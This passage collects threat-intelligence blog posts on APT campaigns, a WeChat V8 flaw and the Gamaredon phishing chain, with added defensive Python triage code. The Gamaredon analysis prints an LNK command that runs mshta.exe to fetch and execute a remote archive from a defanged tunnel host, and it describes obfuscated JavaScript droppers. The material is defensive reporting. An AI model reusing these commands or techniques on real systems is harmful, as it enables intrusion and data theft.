Talos released a new Snort rule set and several ClamAV signatures to detect and block the malicious files Talos analyzed as part of this research. Our blog post also has an in-depth breakdown of the four major themes used across these malicious documents, information that could be crucial to informing potential targets about these threats.  

Top security headlines of the week 

A new report from Google’s Threat Analysis Group found that Russia’s APT29 is exploiting some of the same vulnerabilities as two popular spyware vendors. The analysis comes from watering hole attacks that researchers saw in the wild between November 2023 and July 2024 targeting Mongolian government websites. APT29, largely thought to be connected to Russia’s government, exploited the same vulnerabilities in Apple iOS WebKit and Google Chrome that two spyware vendors, Intellexa and NSO Group, are also known to use. The actor (also known as Cozy Bear and Midnight Blizzard) compromised the government-controlled websites to embed malicious payloads in hidden iframes on web pages. These iframes pointed users to attacker-controlled websites, where the exploits were deployed to steal user data from iOS and Android devices. Intellexa, which Cisco Talos has reported on several times, was recently blacklisted by the U.S. government for its role in creating and distributing the Predator spyware. And the Israeli NSO Group is infamous for its Pegasus spyware, commonly used to target at-risk individuals like journalists, politicians and activists. (Google TAG, The Record)

A North Korean state-sponsored actor known as Citrine Sleet is actively exploiting a zero-day vulnerability in the Google Chrome web browser to steal users’ cryptocurrency. Microsoft wrote in an advisory regarding the vulnerability, identified as CVE-2024-7971, that users had been “targeted and compromised” by the zero-day attack. Google has since released a patch for the issue. CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow an attacker to execute remote code on the targeted machine. Citrine Sleet is believed to be based in North Korea and primarily targets financial institutions, especially those that manage cryptocurrency accounts. Its social engineering techniques focus on the cryptocurrency industry and individuals believed to be associated with it. Exploitation of the vulnerability started by tricking a victim into visiting an attacker-controlled website. Then, because of a different vulnerability in the Windows kernel, Citrine Sleet could install a rootkit on the target’s computer, essentially giving them complete control of the machine. Cryptocurrency has long been a target for North Korean state-sponsored actors, who often use the stolen currency to fund the country’s military operations. (TechCrunch, Decipher)

The FBI released a new warning this week that North Korean actors could soon launch a wave of cyber attacks targeting “organizations with access to large quantities of cryptocurrency-related assets or products.” A public service announcement released Tuesday said that actors had been carrying out reconnaissance-related social engineering campaigns for months targeting individuals believed to be involved in the cryptocurrency industry, or employees of financial institutions who handle virtual currency. Most of the potential targets are found by the actors by monitoring their social media activity, particularly on professional networking or employment-related platforms. These actors also are impersonating legitimate employees, looking to gain remote employment at these companies using fake names, identities and profiles. “Given the scale and persistence of this malicious activity, even those well versed in cybersecurity practices can be vulnerable to North Korea’s determination to compromise networks connected to cryptocurrency assets,” the PSA reads. (Dark Reading, FBI)

Can’t get enough Talos? 


Vulnerabilities in Microsoft apps for macOS allow stealing permissions 

BlackByte ransomware group targets VMware ESXi bug 

Cisco: BlackByte ransomware gang only posting 20% to 30% of successful attacks 

Bug Leaves Microsoft Apps for MacOS Open to Silent Takeovers 

Upcoming events where you can find Talos 

LABScon (Sept. 18 – 21)  

Scottsdale, Arizona 

VB2024 (Oct. 2 – 4) 

Dublin, Ireland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf 
MD5: 2cfc15cb15acc1ff2b2da65c790d7551 
Typical Filename: rcx4d83.tmp 
Claimed Product: N/A   
Detection Name: Win.Dropper.Pykspa::tpd 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll 
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201 

SHA 256: 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d 
MD5: fd743b55d530e0468805de0e83758fe9 
Typical Filename: KMSAuto Net.exe 
Claimed Product: KMSAuto Net 
Detection Name: W32.File.MalParent 

Cisco Talos Blog – Read More

Watch our new documentary, “The Light We Keep: A Project PowerUp Story”

You may have already read about the incredible story of Project PowerUp – how we worked with a multi-company, multi-national team to find a way to keep the lights on in Ukraine in the face of electronic warfare. 

Today, we are releasing a short documentary on how this story came to be, while exploring the impact on the daily lives of millions of Ukrainians. The documentary delves into the history of targeted attacks against Ukrainian critical infrastructure, from the Black Energy attack in 2015 to the Industroyer campaign the following year. We then study a unique challenge involving GPS jamming, which came up during a chance conversation over dinner with some of our Ukrainian partners. 

We hope this story shines a light on some of the issues faced within an electronic warfare zone, and how sometimes thinking outside of the box isn’t enough. Sometimes, you need to first create the box.

Join our live Q & A with some of the people featured in the documentary or watch it back on demand.

Read more about Project PowerUp

Cisco Talos Blog – Read More

The Rise of Head Mare: A Geopolitical and Cybersecurity Analysis 

Key takeaways 


The Head Mare hacktivist group targets Russian and Belarusian organizations, linking their cyberattacks to geopolitical tensions with Ukraine. 

Head Mare’s attacks on Russia and Belarus are strategic, aiming to influence political and economic stability in these countries and support its own objectives. 

The group uses sophisticated phishing and ransomware attacks, exploiting vulnerabilities like CVE-2023-38831 in WinRAR and ransomware strains like LockBit and Babuk. 

Head Mare’s cyber operations align with the Russo-Ukrainian conflict, applying pressure on Russia and Belarus to distract from Ukraine’s military actions. 

The group employs advanced techniques for persistence and evasion, disguising malware and using sophisticated tools to control compromised systems. 

Head Mare uses the Sliver framework to manage compromised systems, ensuring their command-and-control infrastructure is resilient. 

Tools like Mimikatz are used to extract credentials, enhancing their control over targeted networks. 

Overview 

The Head Mare hacktivist group has emerged as a formidable digital adversary in today’s geopolitical conflicts. First reported in 2023 on X (previously Twitter), Head Mare has targeted Russian and Belarusian organizations. The group’s actions are not merely technical intrusions but are deeply entwined with the broader political tensions between these countries and their neighbors, particularly in the context of the ongoing Russo-Ukrainian conflict. 

Head Mare’s focus on Russian and Belarusian entities is a strategic choice rather than a coincidence. By targeting organizations within these nations, Head Mare aligns its cyber operations with the geopolitical friction between Russia, Belarus, and Ukraine. This approach reflects a deliberate attempt to influence the political and economic stability of these countries through cyber means, thus amplifying the existing geopolitical tensions. 

The group’s operations include deploying sophisticated phishing campaigns and ransomware attacks. By exploiting vulnerabilities like CVE-2023-38831 in WinRAR and utilizing ransomware strains such as LockBit and Babuk, Head Mare aims to destabilize key organizations within Russia and Belarus.  

The Geopolitical Angle of Head Mare’s Activities 

The geopolitical implications of Head Mare’s activities are evident in their choice of targets and methods. By focusing on Russian and Belarusian organizations, Head Mare is engaging in a form of cyber warfare that complements the broader Russo-Ukrainian conflict. The group’s attacks are likely intended to support Ukraine’s strategic objectives by applying additional pressure on Russia and Belarus. 

The Russian military’s struggles, especially following Ukraine’s recent offensive into Kursk, have heightened the need for strategic distractions. President Vladimir Putin has used Belarus to create a diversion, hoping that the buildup of Belarusian troops near the Ukrainian border would draw Ukrainian forces away from their offensive operations. Head Mare’s attacks fit into this geopolitical maneuvering by amplifying the pressure on Russia and Belarus. 

The situation on the ground further illustrates the intertwining of cyber operations and geopolitical strategy. In August, Belarusian President Alyaksandr Lukashenka announced the deployment of a significant portion of Belarus’s army to the Ukrainian border, citing concerns over a potential Ukrainian offensive. Lukashenka claimed this move was a response to a perceived build-up of Ukrainian troops, which he attributed to a misunderstanding of Belarus’s preparations for Independence Day celebrations. 

Despite the official narrative, Lukashenka’s actions are likely influenced by Moscow’s broader strategy. The Belarusian leader’s military deployment aligns with Putin’s attempt to create a strategic diversion. However, Belarus’s involvement in the conflict remains complex.  

Lukashenka’s regime is heavily dependent on Russian support, yet Belarusian society shows limited enthusiasm for direct involvement in the war against Ukraine. This lack of domestic support, combined with Lukashenka’s precarious political position, suggests that a full-scale Belarusian invasion of Ukraine remains unlikely. 

Technical Sophistication and Strategic Intent 

Head Mare’s cyber tactics reflect both technical sophistication and strategic intent. The group employs advanced phishing techniques to exploit vulnerabilities in widely used software, such as WinRAR. By deploying multiple malware types, Head Mare establishes a foothold in targeted systems, enabling further attacks and data collection. 

Persistence techniques are another hallmark of Head Mare’s operations. By adding malware samples to the Windows Run registry key or creating scheduled tasks, the group ensures that their malware remains active and continues to transmit data to their command-and-control servers. These methods not only enhance the group’s operational longevity but also contribute to the ongoing disruption. 

Detection evasion is a critical component of Head Mare’s strategy. The group disguises its malware as legitimate software, using deceptive filenames to bypass traditional security measures. This approach allows them to maintain a low profile while exerting a significant influence over compromised systems. 

Command and Control Infrastructure and Credential Theft 

Head Mare utilizes the Sliver framework for managing compromised systems, demonstrating a high level of sophistication in its cyber operations. Sliver enables the group to execute commands, manage connections, and navigate network restrictions effectively. By disguising its Sliver implants and using VPS/VDS servers, Head Mare ensures that its command-and-control infrastructure remains resilient and challenging to dismantle. 

Credential theft is another crucial aspect of Head Mare’s strategy. Tools like Mimikatz and XenArmor All-In-One Password Recovery Pro3 facilitate the extraction of credentials from compromised systems. This capability allows Head Mare to escalate their access and maintain control over targeted networks, amplifying their disruptive impact. 

Head Mare’s use of ransomware, including LockBit and Babuk, highlights their intent to cause maximum disruption. LockBit targets Windows systems, while Babuk is designed for ESXi servers. The encryption of files and the demand for ransoms serve both financial and operational purposes. By employing multiple ransomware variants and encrypting files twice, Head Mare increases the complexity of recovery and intensifies the pressure on victims to comply with their demands. 

Conclusion 

Head Mare’s cyber operations illustrate the evolving nature of cyber threats and their intersection with geopolitics. By targeting organizations in Russia and Belarus with sophisticated phishing and ransomware attacks, the group leverages its technical capabilities to influence political outcomes and create disruption.  

Head Mare’s operations are a reflection of the broader geopolitical dynamics at play, with their cyber tactics serving as a means to exert political pressure and shape public perceptions. As the conflict between Russia and Ukraine continues to unfold, the role of cyber actors like Head Mare will likely remain an influential factor in international relations and security. 

Recommendations and Mitigation 

To counteract the threats posed by Head Mare and similar actors, organizations should implement the following best practices: 


Continuously scan for vulnerabilities and apply patches promptly to mitigate the risk of exploitation. 

Maintain encrypted backups in isolated locations to safeguard against ransomware attacks. 

Use EDR solutions to detect and respond to malicious activities in real time. 

Educate employees on recognizing and avoiding phishing attempts and other cyber threats. 

Keep systems and software up to date with the latest security patches to reduce vulnerabilities. 

Indicators of Compromise (IOCs) 



The post The Rise of Head Mare: A Geopolitical and Cybersecurity Analysis appeared first on Cyble.

Blog – Cyble – Read More

The 2024 Threat Landscape State of Play

As we head into the final furlong of 2024, we caught up with Talos’ Head of Outreach Nick Biasini to ask him what sort of year it’s been so far in the threat landscape. 

In this video, Nick outlines his two major areas of concern. He also focuses on one state-sponsored actor that has been particularly active this year (Clue: It rhymes with “Bolt Teaspoon”), and we talk about why the infostealer market has gone through a maturing phase, and why that’s an issue for defenders.

After you’ve watched the video, I’ve highlighted some of our threat spotlight blogs from the year so far below, which may be worth a revisit.

2024 in threat research:

Jan. 18: Exploring malicious Windows drivers

Drivers have long been of interest to threat actors, whether they are exploiting vulnerable drivers or creating malicious ones. Malicious drivers are difficult to detect and successfully leveraging one can give an attacker full access to a system. Part 1 of our Driver series served as a starting point for learning about malicious drivers while part 2, released in June, covered the I/O system, IRPs, stack locations, IOCTLs and more.

Feb. 8: New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

Talos discovered a new, stealthy espionage campaign that likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.” 

Feb. 15: TinyTurla Next Generation — Turla APT spies on Polish NGOs

This backdoor we called “TinyTurla-NG” (TTNG) was similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.

Feb. 20: Astaroth, Mekotio & Ousaban abusing Google Cloud Run in LATAM-focused malware campaigns

Since September 2023, we observed a significant increase in the volume of malicious emails leveraging the Google Cloud Run service to infect potential victims with banking trojans.

Feb. 27: TimbreStealer campaign targets Mexican users with financial lures

Talos observed a phishing spam campaign targeting victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023.

March 5: GhostSec’s joint ransomware operation and evolution of their arsenal

We observed a surge in GhostSec’s malicious activities this past year. GhostSec evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware.

April 9: Starry Addax targets human rights defenders in North Africa with new malware

We disclosed a new threat actor we deemed “Starry Addax” targeting mostly human rights activists, associated with the Sahrawi Arab Democratic Republic (SADR) cause with a novel mobile malware.

April 16: Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials

Talos actively monitored a global increase in brute-force attacks against a variety of targets, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services since at least March 18, 2024.  

April 17: OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal

During a threat-hunting exercise, Talos discovered documents with potentially confidential information originating from Ukraine. The documents contained malicious VBA code, indicating they may be used as lures to infect organizations. 

April 23: Suspected CoralRaider continues to expand victimology using three information stealers

Talos discovered a new PowerShell command-line argument embedded in the LNK file to bypass anti-virus products and download the final payload onto the victim’s host.

April 24: ArcaneDoor — New espionage-focused campaign found targeting perimeter network devices

ArcaneDoor was the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns.

May 22: From trust to trickery: Brand impersonation over the email attack vector

Cisco developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation.

May 31: New banking trojan “CarnavalHeist” targets Brazil with overlay attacks

Since February 2024, Cisco Talos observed an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) were common among other banking trojans coming out of Brazil.

June 5: DarkGate switches up its tactics with new payload, email templates

DarkGate was observed distributing malware through Microsoft Teams and even via malvertising campaigns.

Aug. 1: APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups.

Aug. 28: BlackByte blends tried-and-true tradecraft with newly disclosed vulnerabilities to support ongoing attacks

In recent investigations, Talos Incident Response observed the BlackByte ransomware group using techniques that depart from their established tradecraft. 

 

You can always bookmark the Threat Source newsletter to keep up to date with all things Talos threat research.

Cisco Talos Blog – Read More

Vulnerability in Tencent WeChat custom browser could lead to remote code execution

Certain versions of WeChat, a popular messaging app created by tech giant Tencent, contain a type confusion vulnerability that could allow an adversary to execute remote code. While this issue, CVE-2023-3420, was disclosed and patched in the V8 engine in June 2023, the WeChat WebView component was not updated and still remained vulnerable when Talos reported it to the vendor in April 2024. Cisco Talos researchers have confirmed that WeChat versions up to 8.0.42 (the latest version on the Google Play store for Android devices before June 14, 2024) were vulnerable to this issue. However, due to the dynamic WebView loading mechanism, Talos cannot confirm whether it is patched on all versions. Talos reported the vulnerability to Tencent WeChat on April 30, 2024, and continued our investigation in the following weeks and months. 

Vulnerability overview 

WeChat is an instant messenger application with a large user base in China. It also offers users the ability to pay for certain products through the app and includes several functionalities similar to other social media platforms like Facebook and X. 

During Cisco Talos’ research of WeChat, we uncovered that it employs a custom WebView component instead of relying on the built-in Android WebView. This component is a custom version of XWalk, maintained by Tencent, which consists of an embedded Chromium browser with V8 version 8.6.365.13 released on Oct. 12, 2020, supporting the rendering of HTML and the execution of JavaScript. 

The custom WebView component is dynamically downloaded onto the phone after the user logs into the app for the first time, allowing Tencent to deploy dynamic updates. When downloaded, the XWalk WebView is located at the path `/data/data/com.tencent.mm/app_xwalk_4433/apk/base.apk`. The library at `/data/data/com.tencent.mm/app_xwalk_4433/extracted_xwalkcore/libxwebcore.so` contains an embedded browser environment with an outdated version of V8.  

GitHub Security Labs published detailed analysis of this vulnerability, CVE-2023-3420, for V8 version 11.4.183.19 in June 2023.      

How can the exploit be triggered? 

The exploit, which we have seen in the wild, is triggered when the victim clicks a URL in a malicious WeChat message. Clicking a URL in WeChat loads the webpage, with its embedded JavaScript, inside XWalk, which triggers exploitation: a so-called one-click exploit. 

What is the impact of this vulnerability? 

The exploit allows the threat actor to gain control of the victim’s device and execute arbitrary code. 

CVSSv3 Score: 8.8 – CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

How do I know if I’m impacted? 

Talos has confirmed that WeChat version 8.0.42 (the latest version available on the Play Store before June 14) is impacted. For WeChat using the impacted custom browser (MMWEBID/2247), the User-Agent of its requests includes the version information of the custom browser. For example: 

Mozilla/5.0 (Linux; Android 14; Pixel 6 Build/UQ1A.240105.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/4433 MMWEBSDK/20230805 Mobile Safari/537.36 MMWEBID/2247 MicroMessenger/8.0.42.2428(0x28002A48) WeChat/arm64 Weixin GPVersion/1 NetType/4G Language/en ABI/arm64  
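To turn the User-Agent check above into something a defender can run over web-proxy or access logs, here is an added Python example (not Talos code). It treats only what the page confirms as vulnerable: the XWEB/4433 core and MicroMessenger versions up to 8.0.42; everything else is reported as unconfirmed rather than safe, because Talos could not verify that every XWalk core was updated. The updated client line with XWEB/9999 and the tab-separated log format are constructed placeholders.

```python
import re
from typing import Optional

# Confirmed on the page: the app_xwalk_4433 core (XWEB/4433, Chromium 86 / V8 8.6)
# shipped with WeChat up to 8.0.42 was vulnerable to CVE-2023-3420.
CONFIRMED_VULNERABLE_XWEB = {"4433"}
LAST_CONFIRMED_VULNERABLE_WECHAT = (8, 0, 42)

UA_TOKENS = {
    "chrome": re.compile(r"\bChrome/(\d+)\."),
    "xweb": re.compile(r"\bXWEB/(\d+)"),
    "mmwebid": re.compile(r"\bMMWEBID/(\d+)"),
    "wechat": re.compile(r"\bMicroMessenger/(\d+(?:\.\d+)*)"),
}

# The User-Agent quoted on the page (vulnerable) and a constructed one standing in
# for an updated client. XWEB/9999 is a placeholder, not a real core version.
PAGE_UA = (
    "Mozilla/5.0 (Linux; Android 14; Pixel 6 Build/UQ1A.240105.002; wv) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 "
    "XWEB/4433 MMWEBSDK/20230805 Mobile Safari/537.36 MMWEBID/2247 "
    "MicroMessenger/8.0.42.2428(0x28002A48) WeChat/arm64 Weixin GPVersion/1 "
    "NetType/4G Language/en ABI/arm64"
)
UPDATED_UA = PAGE_UA.replace("XWEB/4433", "XWEB/9999").replace(
    "MicroMessenger/8.0.42.2428", "MicroMessenger/8.0.48.0")


def parse_wechat_ua(ua: str) -> Optional[dict]:
    """Pull the WeChat-specific tokens out of a User-Agent string.
    Returns None when the request did not come from WeChat's embedded browser."""
    if "MicroMessenger/" not in ua:
        return None
    fields = {}
    for key, rx in UA_TOKENS.items():
        m = rx.search(ua)
        fields[key] = m.group(1) if m else None
    return fields


def version_tuple(version: str) -> tuple:
    return tuple(int(part) for part in version.split("."))


def assess_wechat_ua(ua: str) -> dict:
    """Classify one User-Agent against the page's confirmed-vulnerable set."""
    fields = parse_wechat_ua(ua)
    if fields is None:
        return {"verdict": "not-wechat", "reasons": []}
    reasons = []
    if fields["xweb"] in CONFIRMED_VULNERABLE_XWEB:
        reasons.append(f"XWEB/{fields['xweb']} is the confirmed-vulnerable XWalk core")
    if fields["wechat"] and version_tuple(fields["wechat"])[:3] <= LAST_CONFIRMED_VULNERABLE_WECHAT:
        reasons.append(f"MicroMessenger/{fields['wechat']} is at or below 8.0.42")
    verdict = "confirmed-vulnerable" if reasons else "unconfirmed (check XWEB core)"
    return {"verdict": verdict, "reasons": reasons, **fields}


def scan_access_log(lines):
    """Apply the check to 'client_ip<TAB>user_agent' lines (constructed format)
    and return one finding per WeChat client seen."""
    findings = []
    for line in lines:
        client, _, ua = line.rstrip("\n").partition("\t")
        result = assess_wechat_ua(ua)
        if result["verdict"] != "not-wechat":
            findings.append((client, result["verdict"], result["wechat"], result["xweb"]))
    return findings


if __name__ == "__main__":
    # Constructed sample log: two WeChat clients and one non-WeChat client.
    sample_log = [f"10.0.0.5\t{PAGE_UA}", f"10.0.0.9\t{UPDATED_UA}", "10.0.0.7\tcurl/8.4.0"]
    for finding in scan_access_log(sample_log):
        print(*finding, sep=" | ")
```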

What do I do if I’m impacted? 

Update to the latest version of WeChat and confirm that XWalk is updated as well (in our testing, the app did not update to the latest version automatically right after the update was released). Alternatively, do not click on any links sent over WeChat if using the impacted versions. If you must read links, copy the link from the WeChat chat and open it in an updated web browser outside the application. We recommend WeChat users be aware of URL links sent in WeChat; before clicking a link, verify it is from a trusted source.  

Bug report Timeline 

April 30, 2024: Disclosed to vendor while research was ongoing. 

May 31, 2024: Tencent acknowledges report and confirms they know about the vulnerability and are working on patching it. 

June 14, 2024: New version of WeChat 8.0.48 released on Play Store. However, the app on our testing device did not get automatically updated. 

June 27, 2024: Notified vendor of our intention to publish. 

Credit 

Chi En Shen (Ashley Shen), Vitor Ventura, Michael Gentile and Aleksandar Nikolic of Cisco Talos.  

Cisco Talos Blog – Read More

Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military

Key Takeaways


Cyble Research and Intelligence Labs (CRIL) identified an active Gamaredon campaign targeting Ukrainian military personnel through spear-phishing emails.

The emails include malicious XHTML attachments, which, when opened, execute obfuscated JavaScript code that downloads a malicious archive to the victim’s system.

This archive contains a Windows shortcut (LNK) file that, when triggered, initiates the execution of a remote .tar archive hosted on TryCloudflare[.]com via mshta.exe.

The Threat Actors (TAs) leverage TryCloudflare’s one-time tunnel feature to anonymously host malicious files and access resources remotely without detection.

The campaign appears to be large-scale and coordinated, as indicated by the widespread distribution of similar files, and it remains ongoing based on the volume and timing of discovered samples.

The inclusion of a 1-pixel remote image suggests the TAs are tracking victim interactions with the malicious files, likely to monitor the campaign’s effectiveness.

Executive Summary

As the Russia-Ukraine conflict continues to evolve, we remain vigilant in monitoring emerging threats. Previously, we tracked the activities of UNC1151, which targeted Ukraine’s Ministry of Defence with a malicious Excel document designed to compromise sensitive systems. Additionally, we observed UAC-0184’s malware campaign, which deployed the XWORM RAT against Ukrainian targets, utilizing Python to facilitate DLL sideloading techniques for further infiltration.

During our investigation, we came across an ongoing campaign of Gamaredon targeting Ukraine. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-linked Advanced Persistent Threat (APT) group that has been active since at least 2013. It is known for its cyber-espionage activities, primarily targeting Ukrainian government institutions, military, and other critical infrastructure sectors.

Gamaredon has been involved in numerous high-profile campaigns, particularly during periods of heightened tension between Russia and Ukraine. Although its operations have been characterized by the use of relatively low-sophistication tools, its success is attributed to its persistence and focus on specific geopolitical targets.

In recent months, Gamaredon has intensified its efforts with a large-scale phishing campaign aimed at Ukrainian entities. This campaign involves sophisticated tactics and widespread phishing attempts, reflecting the ongoing and escalating nature of cyber threats amidst the conflict. The figure below shows the Gamaredon samples observed since the start of August 2024.

Amid the ongoing Russia-Ukraine conflict, Cyble Research and Intelligence Labs (CRIL) encountered a spear-phishing campaign targeting Ukrainian military personnel. The malicious email contains an XHTML attachment that, upon opening, executes several malicious activities on the infected system. After thorough analysis, our research points to the Gamaredon APT group as the orchestrator of this attack. 

Technical Details

The campaign begins with a spear-phishing email bearing the subject “ПОВІСТКА,” which translates to “summons.” The email is themed around a military summons directed at the recipient and includes a malicious XHTML attachment, as shown in the figure below.

Upon opening the XHTML file, the user is presented with a message in Ukrainian stating, “File uploaded to the ‘DOWNLOADS’ folder.” Simultaneously, a RAR compressed folder is silently dropped into the system’s Downloads directory. This action is designed to mislead the victim, making it appear as though a legitimate file has been downloaded. The figure below shows the XHTML message.

The XHTML file contains obfuscated JavaScript code that executes upon the user opening the file. In the XHTML, the JavaScript is embedded within a `div` element, with the `div id` set to “jwu.” This obfuscated script consists of a Base64-encoded string mixed with a “*” character at random places to evade detection. The JavaScript execution is triggered via the “onerror” event. In some variants, it is activated through the “onmousemove” event, ensuring the malicious code runs as soon as the user interacts with the file. The figure below shows the obfuscated XHTML code.

The de-obfuscated string within the “jwu” `div` reveals JavaScript code that contains a Base64-encoded 7zip compressed archive disguised with a .rar file extension. This script decodes the Base64 data and saves the 7zip archive to the Downloads folder as “5-2839-2024_29.08.2024.rar.” Additionally, the script retrieves a 1-pixel remote image, likely serving as a tracking mechanism to monitor the execution and interaction with the malicious file. The figure below shows the de-obfuscated JavaScript.
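The decoding steps described above (strip the filler characters, Base64-decode, and compare the real archive type with the name the script saves it under) are easy to reproduce in a triage script. The block below is an added example written for this page, not code from the Cyble report or from the malicious file; it goes slightly beyond the post by removing any non-Base64 filler, not only "*", and by checking for both 7-Zip and RAR signatures. The XHTML it parses is a constructed sample built inside `build_sample()`, and the `onload` trigger in `EVENT_TRIGGERS` is an assumption added alongside the two handlers the post names.

```python
import base64
import re

# Archive signatures used to identify what the decoded blob really is, regardless
# of the extension the dropper gives it.
MAGIC = {
    "7z": b"7z\xbc\xaf\x27\x1c",   # 7-Zip
    "rar": b"Rar!\x1a\x07",        # RAR 4.x and 5.x both start this way
}

# Event handlers the post reports as triggers (onerror, onmousemove); onload is a
# common alternative added here as an assumption.
EVENT_TRIGGERS = ("onerror", "onmousemove", "onload")


def extract_div_payloads(xhtml: str) -> dict:
    """Return {div_id: inner_text} for every <div id="..."> in the document."""
    pattern = re.compile(r'<div[^>]*\bid="([^"]+)"[^>]*>(.*?)</div>', re.S | re.I)
    return {m.group(1): m.group(2) for m in pattern.finditer(xhtml)}


def clean_base64(blob: str) -> str:
    """Drop everything outside the Base64 alphabet. This removes the '*' noise the
    post describes and, more generally, any other filler character."""
    return re.sub(r"[^A-Za-z0-9+/=]", "", blob)


def decode_payload(blob: str) -> bytes:
    """Clean and decode an obfuscated Base64 blob, tolerating stripped padding."""
    cleaned = clean_base64(blob)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True)


def identify_archive(data: bytes) -> str:
    """Name the archive format from its magic bytes, or 'unknown'."""
    for name, sig in MAGIC.items():
        if data.startswith(sig):
            return name
    return "unknown"


def find_triggers(xhtml: str) -> list:
    """Event-handler attributes present in the document, e.g. ['onerror']."""
    return sorted(ev for ev in EVENT_TRIGGERS
                  if re.search(rf"\b{ev}\s*=", xhtml, re.I))


def triage(xhtml: str, div_id: str, claimed_name: str) -> dict:
    """Decode the payload in <div id=div_id> and compare its real type with the
    file name the script would save it under."""
    data = decode_payload(extract_div_payloads(xhtml)[div_id])
    kind = identify_archive(data)
    claimed_ext = claimed_name.rsplit(".", 1)[-1].lower()
    return {
        "triggers": find_triggers(xhtml),
        "archive_type": kind,
        "claimed_extension": claimed_ext,
        "extension_mismatch": kind != "unknown" and kind != claimed_ext,
        "payload_size": len(data),
    }


def build_sample() -> str:
    """Constructed sample, not a real campaign file: a fake 7z header as the
    'archive', Base64-encoded and salted with '*' every five characters."""
    payload = MAGIC["7z"] + b"\x00\x04" + b"constructed-sample-body"
    b64 = base64.b64encode(payload).decode()
    noisy = "*".join(b64[i:i + 5] for i in range(0, len(b64), 5))
    return ('<html xmlns="http://www.w3.org/1999/xhtml"><body>'
            f'<div id="jwu">{noisy}</div>'
            '<img src="x" onerror="run()"/>'
            '</body></html>')


if __name__ == "__main__":
    # The file name is the one the post reports for the dropped archive.
    print(triage(build_sample(), "jwu", "5-2839-2024_29.08.2024.rar"))
```

The `extension_mismatch` flag is the useful signal: a blob whose magic bytes say 7-Zip but whose name says `.rar` is exactly the disguise the post describes, and the check does not depend on the Base64 filler character the next variant happens to use.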

The RAR file contains a Windows shortcut (LNK) file. Upon execution, the malicious LNK file triggers the execution of the remote .tar file via mshta.exe. In this campaign, the TAs leveraged the domain trycloudflare[.]com to host the malicious tar archives. By exploiting the TryCloudflare service, TAs can establish a one-time tunnel without the need for an account with Cloudflare. This tunnel enables remote access to resources and data outside the local network, functioning similarly to a VPN or secure shell (SSH) protocol, allowing the attackers to evade traditional detection mechanisms.

The Target command of the LNK file is shown below.

“C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcg/instruct/instructor.tar /f”

The figure below shows the properties of the LNK file.

We were unable to obtain the .tar files in our research. However, according to an analysis by Cisco Talos, Gamaredon is known for downloading additional malicious files designed to steal sensitive information from the victim’s system.

Conclusion

The ongoing Gamaredon APT campaign demonstrates the group’s persistence and evolving tactics in targeting Ukrainian military personnel. By leveraging spear-phishing emails, malicious XHTML attachments, and obfuscated JavaScript, the attackers deliver harmful payloads while exploiting TryCloudflare’s one-time tunnel feature to host malicious archives. The campaign’s scale and frequency indicate a coordinated, mass phishing effort aimed at sensitive Ukrainian entities.

Recommendations

The following recommendations help mitigate the Gamaredon APT campaign:
Train users to recognize spear-phishing attempts, especially those with suspicious attachments or unexpected military-themed content.

Implement email security solutions with advanced threat protection, filtering phishing emails and malicious attachments.

Deploy anti-malware solutions capable of detecting and blocking obfuscated JavaScript and malicious LNK files. 

Monitor for unusual network activity, including connections to TryCloudflare tunnels and other unknown external resources.

Use application whitelisting to allow only trusted applications and scripts to run.

Leverage threat intelligence platforms to block known malicious domains, including those abusing TryCloudflare.
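The monitoring recommendation above, together with the LNK-to-mshta.exe chain described in the Technical Details, can be turned into a concrete process-creation detection. The block below is an added example for this page, not a rule shipped by Cyble or by any product: it takes Sysmon-style events (the `Image`/`ParentImage`/`CommandLine` field names are an assumption), flags mshta.exe launched with a remote URL, and raises the priority when that URL points at a `*.trycloudflare.com` quick tunnel or at an archive. The sample events are constructed; the second one mirrors the LNK target command shown in the post, the others are benign look-alikes.

```python
import re
from urllib.parse import urlparse

# Assumed event shape: a dict with Sysmon-style "Image", "ParentImage" and
# "CommandLine" keys (an assumption, not a field list from the report).
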